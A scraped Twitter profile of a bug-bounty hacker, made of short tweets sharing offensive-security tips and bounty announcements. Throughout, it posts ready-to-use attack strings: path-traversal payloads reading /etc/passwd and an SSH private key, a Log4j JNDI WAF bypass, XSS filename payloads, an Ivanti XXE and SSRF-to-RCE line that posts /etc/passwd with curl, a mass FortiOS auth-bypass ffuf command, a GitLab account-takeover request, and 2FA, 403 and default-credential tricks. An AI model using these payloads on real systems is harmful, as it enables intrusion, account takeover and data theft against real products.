H4x0r.DZ @h4x0r_dz Twitter profile

Pinned Tweet

H4x0r.DZ

2 years

My new writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite

23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite

How I found Authentication Bypass >> File upload vulnerability >> Arbitrary File Overwrite and how I managed I found the path of the file…

medium.com

116

548

2K

Last Seen Profiles

@suuiiin

@jeremylhs_

@lucky_luck_Hey

@Aandrea_Sexx

@PennockPost

@AkyaziliThomas

@thenopant

@_Liamora_

@hram_abn

@NSNsasazuka

@stwmaniax

@bokeplokalmalam

@12baegirl

@Isaias01046780

@Fooz37202185

@tane_daaa

@jj_wilds

@everbhatesFYE

@fasist54

@bokeplokalmalam

@Dried_seFish

@spoerhase

@bokeplokalmalam

@lunnnabunna

@Longshot_Ted

@dako_mori

@bokeplokalmalam

@rjb830

@SiteOneSupply

@DeRozan_Muse

@PandemicStuff

@apapoblesec

@Yuka51_sakura

@tystaples11

@bokeplokalmalam

@triblover5

H4x0r.DZ

@h4x0r_dz

4 years

A nice tricks to bypass 403/401. #BugBounty #bugbountytips

69

1K

4K

H4x0r.DZ

@h4x0r_dz

2 years

Search for all leaked keys/secrets using one regex! regex: #BugBounty #bugbountytip

96

747

2K

H4x0r.DZ

@h4x0r_dz

2 years

I wasted my entire life using PuTTY while MobaXterm exist #linux #ssh

113

265

2K

H4x0r.DZ

@h4x0r_dz

3 years

CVE-2021-41773 POC 127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

28

613

2K

H4x0r.DZ

@h4x0r_dz

3 years

If you Are Interested In Developing your Hacking skills Read some amazing @BlackHatEvents pdf <3. Demo Google dork: site: intext:"RCE" filetype:pdf #CyberSecurity #BugBounty #infosec

16

491

1K

H4x0r.DZ

@h4x0r_dz

3 years

Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF :

11

442

1K

H4x0r.DZ

@h4x0r_dz

2 years

Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click

what if I told you that: A black Hat hacker can steal your money from your bank account & credit card or PayPal balance with one click from…

medium.com

58

295

1K

H4x0r.DZ

@h4x0r_dz

3 years

Grafana Exploit POC $HOST/public/plugins/graph/../../../../../../../../etc/passwd

14

417

1K

H4x0r.DZ

@h4x0r_dz

2 years

CVE-2022-40684 ffuf -w "host_list.txt:URL" -u " https://URL/api/v2/cmdb/system/admin/admin" -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "h4x0r"}' -mr "SSH" -r

30

364

1K

H4x0r.DZ

@h4x0r_dz

4 months

LOL

H4x0r.DZ

@h4x0r_dz

5 months

why there is an RCE on Microsoft? #infosec

30

39

499

13

43

1K

H4x0r.DZ

@h4x0r_dz

2 years

A hacker with his Zero-day🥰 #infosec #Security #CyberAttack

32

179

1K

H4x0r.DZ

@h4x0r_dz

5 months

Find Leaked Credentials Using Google Chrome dev Tools (The Best Way 😎) #bugbountytips #bugbounty #infosec

12

272

1K

H4x0r.DZ

@h4x0r_dz

4 years

when you are looking for bugs like SSRF & Open Redirect. and there is a blacklisted character. try to bypassed using other Unicode characters. I found Open Redirect Bypass Using (。) Chinese dot "%E3%80%82". poc: redirect_to=////evil%E3%80%82com #BugBounty #bugbountytip

9

281

931

H4x0r.DZ

@h4x0r_dz

3 months

Getting the maximum impact : read the SSH PRIVATE KEY: aCSHELL/../../../../../../../home/admin/.ssh/id_rsa connect to the server : ssh admin @127 .0.0.1 -i id_rsa

H4x0r.DZ

@h4x0r_dz

3 months

why the fuck SSL VPN softwares are vulnerable to path traversal in the body lol. CVE-2024-24919 Check Point Remote Access #infosec #bugounty #cyberattack I feel like these are backdoors, not bugs LOL

22

134

696

17

177

900

H4x0r.DZ

@h4x0r_dz

3 years

In this tweet, I will explain to you How to find Leaking AWS Keys.

19

334

799

H4x0r.DZ

@h4x0r_dz

3 years

always when you found API endpoint like "/api/v4/anything" add "internal" to the route and you will be surprised 😃 for example : /api/v4/users/<userid> =>> 403 /api/v4/internal/users/<userid> =>> 200 #bugbountytips

10

256

782

H4x0r.DZ

@h4x0r_dz

2 years

I learned hacking by doing hacking! No CTF, certificate ,university...etc We are not the same, you are better than me #infosec

33

66

753

H4x0r.DZ

@h4x0r_dz

2 years

if this #TikTokBreach is true! it gonna be a bad week

13

188

750

H4x0r.DZ

@h4x0r_dz

2 years

Firewall bypass #bugbountytips #infosec

44

152

737

H4x0r.DZ

@h4x0r_dz

4 years

#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')a.png

6

253

724

H4x0r.DZ

@h4x0r_dz

2 years

0day Fans

0dayfans.com

19

169

693

H4x0r.DZ

@h4x0r_dz

3 months

why the fuck SSL VPN softwares are vulnerable to path traversal in the body lol. CVE-2024-24919 Check Point Remote Access #infosec #bugounty #cyberattack I feel like these are backdoors, not bugs LOL

H4x0r.DZ

@h4x0r_dz

5 months

why the fuck SSL VPN softwares are vulnerable to path traversal in the Cookie lol. CVE-2024-3400 GlobalProtect

3

12

161

22

134

696

H4x0r.DZ

@h4x0r_dz

2 years

We are Shopify, not Spotify 🤣

26

46

669

H4x0r.DZ

@h4x0r_dz

2 years

Backup Files (does not exist on any Fuzzing wordlist ! ) hostname*com/hostname.rar , .sql.tar & .tar.gz & .tar.bzip2 & .tar & .sql.bz2 & .7z & .tar.bz2 & .sql.7z ....etc already found so many WordPress websites backups #bugbountytips

15

176

653

H4x0r.DZ

@h4x0r_dz

3 months

XSS.exe

41

18

664

H4x0r.DZ

@h4x0r_dz

2 years

I don't want to live in The matrix anymore This is the real Life :

39

20

650

H4x0r.DZ

@h4x0r_dz

3 years

Some Devs use "Google Groups" as a workplace because it is easy and free. But a lot of sensitive information is leaked Such as "access keys", "aws secrets" ...etc . Dork: site: "$COMPANY" I already found a lot of leaked critical data #bugbountytips

21

193

645

H4x0r.DZ

@h4x0r_dz

1 year

How to Get Unique Subdomains on Large scope ??? I hope you like it .

How to Get Unique Subdomains on Large scope

how to Get The Uniq Subdomains on a big Subdomains list. to print unique ones only

medium.com

5

189

619

H4x0r.DZ

@h4x0r_dz

4 months

many APIs are vulnerable to "JSON Patch" where you have access to the op, you can add, remove, replace, move, copy example : { "op": "replace", "path": "/role", "value": "admin" }, more info : #BugBounty #bugbountytips

7

158

623

H4x0r.DZ

@h4x0r_dz

2 years

I moved From bug bounty to ctf And I can confirm CTF is the real hacking, A bug bounty is just an easy game compared to ctf bug bounty : vulnerability assessment CTF : real hacking

74

44

607

H4x0r.DZ

@h4x0r_dz

3 years

GET /api/users/1337 => 401 GET /api/users/ x-user-id: 1337 =>> 200 Ok POST /api/users/<myID>/password-reset x-user-id: <victimID> full account takeover :) . #bugbountytips

8

196

600

H4x0r.DZ

@h4x0r_dz

4 years

A simple way helped me to find more endpoints/info about #bugbounty target. maybe can help you! site: "target" site: "target" #PenTest #bugbountytip #OSINT #infosec

9

199

603

H4x0r.DZ

@h4x0r_dz

7 months

CVE-2024-22024, XXE on Ivanti Connect Secure payload encoded base64: <?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM " http://{{external-host}}/x"> %xxe;]><r></r> send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm #bugbountytips #cve #Ivanti

4

140

606

H4x0r.DZ

@h4x0r_dz

2 years

/..;/

20

132

588

H4x0r.DZ

@h4x0r_dz

4 years

I have a friend who joins #bugbounty Because of me. He didn't have good internet and no PC. just using his phone. He found 5 bugs using his phone with the worst internet in the world (Algeria). I really feel proud of this boy <3 .

32

58

583

H4x0r.DZ

@h4x0r_dz

2 years

People Who Doing Bug Bounty For Red Bull please stop. You Are Destroying The Field Don't Do Bug Bounty For Free & Drink & T-shirts ...etc When Companies Find Stupid Hackers Like You Who Work For Free, Many Other Companies Will Join The Club. please stop #BugBounty

33

95

577

H4x0r.DZ

@h4x0r_dz

22 days

DEF CON 32 presentations if anyone missed them.. #infosec

5

160

589

H4x0r.DZ

@h4x0r_dz

3 years

Unknown recon Method via waybackurls $TARGET.app.box.com or just use google DORK : site: "$TARGET" Sometimes the employees upload sensitive files to the public on . #bugbountytips #bugbounty

6

202

552

H4x0r.DZ

@h4x0r_dz

3 years

Yay, I was awarded a $20,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder admin panel pwn > file upload > Arbitrary File Overwrite tip: read js files well!

HackerOne profile - h4x0r_dz

1337 - https://twitter.com/h4x0r_dz

hackerone.com

42

41

544

H4x0r.DZ

@h4x0r_dz

6 months

what an incredible auth bypass! /foo?jsp=/authenticated-endpoint;.jsp CVE-2024-27198 TeamCity authentication bypass

8

128

552

H4x0r.DZ

@h4x0r_dz

16 days

I ranked #1 in both Reports and Reputation and placed #14 overall at the Live Hacking Event #H1 -702 in Las Vegas by HackerOne. During the event, I Reported [Critical/High/Medium/low] vulnerabilities in TikTok and Epic Games. This was my first Live Hacking Event, and I'm really

47

13

548

H4x0r.DZ

@h4x0r_dz

4 months

Holy shit, CVE-2024-4367 PDF.js vulnerable to arbitrary JavaScript execution upon opening a malicious PDF #infosec

CVE-2024-4367 - GitHub Advisory Database

PDF.js vulnerable to arbitrary JavaScript execution upon opening a malicious PDF

github.com

8

112

545

H4x0r.DZ

@h4x0r_dz

2 years

My Goal for the 2023 is to quit bug bounty | cybersecurity and other computer stuff and buy a farm and 10 cows 🐄 and 100 chickens and 1337 sheep . I'm still looking for the happiness ✍️

49

32

535

H4x0r.DZ

@h4x0r_dz

5 months

I used BBOT to enumerate subdomains, and I found New subs I had never seen in My Targets! Very Very useful on Large targets #BugBounty #bugbountytips #infosec

14

112

529

H4x0r.DZ

@h4x0r_dz

8 months

Jenkins CVE-2024-23897 Arbitrary file read vulnerability through the CLI can lead to RCE POC #BugBounty #vulnerabilities #rce

12

82

512

H4x0r.DZ

@h4x0r_dz

4 years

Scanning APK file for URIs, endpoints & secrets Using APKLeaks by @dwisiswant0 1.install APKLeaksby 2. Download the APK file. 3. python3 -f app.apk Easy win <3. #bugbountytips #BugsBunny #infosec

7

198

499

H4x0r.DZ

@h4x0r_dz

1 year

I hacked Shopify/Spotify in the same day lol

18

7

495

H4x0r.DZ

@h4x0r_dz

8 months

#bugbountytips There is a lot of web apps vulnerable to this issue

H4x0r.DZ

@h4x0r_dz

8 months

Ok, here is another #bugbountytip You can find this issue with “login with Google ” too, or any other Idp providers During the signup process, delete the email value from the scope 💣

4

34

192

16

88

506

H4x0r.DZ

@h4x0r_dz

4 years

Thousands of US companies have been hacked by Chinese hackers using This RCE. Microsoft Exchange Server Remote Code Execution CVE-2021-26855 Exploit. #BugBounty #RCE #infosec

14

191

491

H4x0r.DZ

@h4x0r_dz

7 months

CVE-2024-21893 Ivanti Connect Secure SSRF to CVE-2024-21887 RCE http://127.0.0.1:8090/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd ;

9

110

499

H4x0r.DZ

@h4x0r_dz

5 months

why there is an RCE on Microsoft? #infosec

30

39

499

H4x0r.DZ

@h4x0r_dz

3 years

Automation Time-based Blind SQL injection on HTTP Headers Using Blisqy tool by @JohnTroony . #BugBounty #bugbountytip

7

216

477

H4x0r.DZ

@h4x0r_dz

3 months

Stop running the Python web server in the root directory. it is funny because most of these IPs are related to C&C LOl #infosec #cyberattack

9

47

474

H4x0r.DZ

@h4x0r_dz

1 year

Unfortunately, this was submitted previously by another researcher, but we appreciate your work and look forward to additional reports from you.

36

58

472

H4x0r.DZ

@h4x0r_dz

2 months

Officially I'm a Certified Ethical Hacker ! I do not recommend a CEH.exe V12 certificate to anyone. it is a waste of time. very old content. Labs Based on a browser with no VPN (the worst labs ever ). this certificate is a waste of Money time & energy. #infosec

53

19

474

H4x0r.DZ

@h4x0r_dz

2 months

Template Injection on ServiceNow by @assetnote http://1337/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style> #bugbounty #infosec

8

96

468

H4x0r.DZ

@h4x0r_dz

11 months

We stand in solidarity with the people of Palestine 🇵🇸

20

45

450

H4x0r.DZ

@h4x0r_dz

2 years

Default Credentials Cheat Sheet

GitHub - ihebski/DefaultCreds-cheat-sheet: One place for all the default credentials to assist the...

One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password 🛡️ - ihebski/DefaultCreds-cheat-sheet

github.com

4

153

457

H4x0r.DZ

@h4x0r_dz

4 months

I'm curious why @ECCOUNCIL offers such expensive certifications when they seem ineffective in cybersecurity. I'm currently taking the CEH course, and the browser-based lab keeps crashing. The PDF is over 2000 pages, with much of the content appearing to be copied from Google

33

57

448

H4x0r.DZ

@h4x0r_dz

2 years

How to use FFUF over multiple hosts $ for i in `cat host.txt`; do ffuf -u $i/FUZZ -w wordlist.txt -mc 200,302,401 -se ;done #bugbountytips #BugBounty #ffuf

18

160

443

H4x0r.DZ

@h4x0r_dz

8 months

Someone claims he has root access to @RealTryHackMe servers he is selling it for 5k$ !

31

47

444

H4x0r.DZ

@h4x0r_dz

8 months

GitLab CE/EE Account Takeover via Password Reset without user interactions CVE-2023-7028 Poc: in the rest password endpoint user[email][]=valid @email .com&user[email][]=attacker @email .com #bugbountytip

6

89

443

H4x0r.DZ

@h4x0r_dz

4 years

Recon 😂😂👌

15

64

420

H4x0r.DZ

@h4x0r_dz

1 year

I'm happy to share that I got OSCP Certificate for the first attempt. Thanks @offsectraining for the training #CyberSecurity #oscp

55

5

420

H4x0r.DZ

@h4x0r_dz

2 years

beg BOUNTY 🤡 #infosec #bugbounty

52

46

413

H4x0r.DZ

@h4x0r_dz

4 years

I just found Open Redirection on public #bugbounty program. I tried all Open Redirect payload {that I know}, and nothing work, only one payload: redirect_to=//evil.com\ @whiteliste .com I hope this will help you :). #bugbountytip

7

115

409

H4x0r.DZ

@h4x0r_dz

2 years

PayPal IDOR via billing Agreement Token (closed Informative, payment fraud)

Hello everyone, in this article I will show you an Insecure direct object references (IDOR) that I found on PayPal 7 months Ago where an attacker can expose PayPal users data: billing address,email…

medium.com

9

101

408

H4x0r.DZ

@h4x0r_dz

3 years

infinite money printing bug on Coinbase. awarded $250k to the hacker POC :

14

93

409

H4x0r.DZ

@h4x0r_dz

2 years

POC, CVE-2022-1388 F5 Big-IP RCE

9

102

408

H4x0r.DZ

@h4x0r_dz

2 months

If you analyze JavaScript files using Burp Suite and use tools like GAP JS Miner, always replace `^If-None-Match.*$` with an empty string to load the files in Burp. Otherwise, on subsequent loads, you'll always get a 304 Not Modified response. #bugbountytips

8

63

408

H4x0r.DZ

@h4x0r_dz

3 years

technique to bypass 2FA I did not saw it In any place. please tell me If it's public. steps : 1. enable 2FA In your account 2. login and send the 2FA code to your email & SMS. 3. Wait until the code 2FA expires (it's Depends ..) 4.put any code. 5. b00M! #bugbountytips

21

138

389

H4x0r.DZ

@h4x0r_dz

4 years

403 ?? Try This: .git/branches/ .git/COMMIT_EDITMSG .git/config .git/description .git/FETCH_HEAD .git/HEAD .git/hooks/ .git/index .git/info/ .git/info/exclude .git/logs/ .git/logs/HEAD .git/logs/refs .git/logs/refs/heads .git/logs/refs/heads/master [1]

2

159

387

H4x0r.DZ

@h4x0r_dz

3 months

Doing Active Directory pentesting

10

20

394

H4x0r.DZ

@h4x0r_dz

2 years

Is it possible to get a job in cybersecurity without certifications ? #bugbountytips #infosec #cybersecurity

117

37

395

H4x0r.DZ

@h4x0r_dz

1 year

Yay, I was awarded a $18,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - h4x0r_dz

1337 - https://twitter.com/h4x0r_dz

hackerone.com

44

14

386

H4x0r.DZ

@h4x0r_dz

5 months

Yay, I was awarded a $1,000,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - h4x0r_dz

1337 - https://twitter.com/h4x0r_dz

hackerone.com

43

14

387

H4x0r.DZ

@h4x0r_dz

2 years

Yay, I was awarded a 3 x 3600$ ($10,800) bounty on @Hacker0x01 ! #TogetherWeHitHarder

HackerOne profile - h4x0r_dz

1337 - https://twitter.com/h4x0r_dz

hackerone.com

35

21

377

H4x0r.DZ

@h4x0r_dz

2 years

20,000 person follow me , I don't know why there is so many people follow this useless guy. I don't deserve all these followers at all, but thanks everyone

35

12

371

H4x0r.DZ

@h4x0r_dz

1 month

you have a big js file ? no time to analyze it all search for these : URLSearchParams window.location URL.searchParams fetch() XMLHttpRequest FormData window.location.hash window.location.href URL.hash #bugbountytips

3

74

376

H4x0r.DZ

@h4x0r_dz

2 years

11

42

355

H4x0r.DZ

@h4x0r_dz

4 months

CVE-2024-27130, an unauthenticated stack overflow bug, which allows remote-code execution on qnap credit @watchtowrcyber Yes Yes it is Friday , the perfect day to drop the 0day

0

66

372

H4x0r.DZ

@h4x0r_dz

4 months

CVE-2024-34351 : Server-Side Request Forgery on Next.js POC: POST /x HTTP/2 Host: attacker*com Content-Length: 2 Next-Action: xxxx {} #BugBounty #bugbountytips

3

68

367

H4x0r.DZ

@h4x0r_dz

11 months

Bombing a hospital is a war crime, Israel is a terrorist

13

77

346

H4x0r.DZ

@h4x0r_dz

2 years

Cross Site Request Forgery (CSRF) is dead!

32

28

349

H4x0r.DZ

@h4x0r_dz

1 year

70

35

355

H4x0r.DZ

@h4x0r_dz

2 years

CVE-2022-26134 Confluence RCE exploit automation : httpx -l list.txt -paths path.txt -match-string "gid="

5

105

354

H4x0r.DZ

@h4x0r_dz

3 years

8

83

355

H4x0r.DZ

@h4x0r_dz

5 months

Yay, I was awarded a $5,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder out-of-bounds write in Fortinet CVE-2024-21762 👀

HackerOne profile - h4x0r_dz

1337 - https://twitter.com/h4x0r_dz

hackerone.com

20

12

348

H4x0r.DZ

@h4x0r_dz

2 years

CVE-2022-44268 ImageMagick Arbitrary File Read

8

64

341

H4x0r.DZ

@h4x0r_dz

11 months

6

59

331

H4x0r.DZ

@h4x0r_dz

9 months

RCE via insecure ~/.ssh/config #infosecurity #CyberSecurity

2

71

334

H4x0r.DZ

@h4x0r_dz

6 months

If The target is running the Postgres SQL server put the Unicode char "\u0000" and see the magic 😄 note: this can break the database

9

44

343

H4x0r.DZ

@h4x0r_dz

2 years

bug bounty is just unpaid pentests

11

29

333

H4x0r.DZ

@h4x0r_dz

3 years

Do not forget to Try login with This Credential In your #bugbounty Target : Email: demo@<company>.com & test<company>.com Password: demo@<company>.com , 123456789,123456,root, ..other default passwords . You will log in to The Company as an Admin If you are lucky. #bugbountytip

8

110

324

H4x0r.DZ

@h4x0r_dz

2 years

I feel I'm Super Hacker This Morning ! To download java from you need to create account And the steps are so boring so I bypassed the login step 😂